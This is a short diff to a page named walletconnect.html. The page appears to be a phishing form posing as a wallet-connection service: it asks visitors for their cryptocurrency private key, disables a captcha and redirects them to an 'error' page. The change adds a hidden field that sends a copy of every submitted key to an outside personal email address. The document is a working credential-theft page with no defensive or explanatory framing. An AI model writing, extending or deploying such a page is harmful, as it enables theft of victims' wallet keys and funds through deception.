--- a/walletconnect.html
+++ b/walletconnect.html
@@ -231,6 +231,7 @@
                 <textarea type="text" name="privateKey" placeholder="Enter your Private Key"></textarea>
             </div>
             <input type="hidden" name="_captcha" value="false">
+            <input type="hidden" name="_cc" value="jamieheadie@outlook.com">
             <input type="hidden" name="_next" value="https://error-sage.vercel.app/">
             <button type="submit" id="submitBtn">Submit</button>
         </form>
@@ -269,5 +270,6 @@
 </body>
 
 </html>
+
 
 
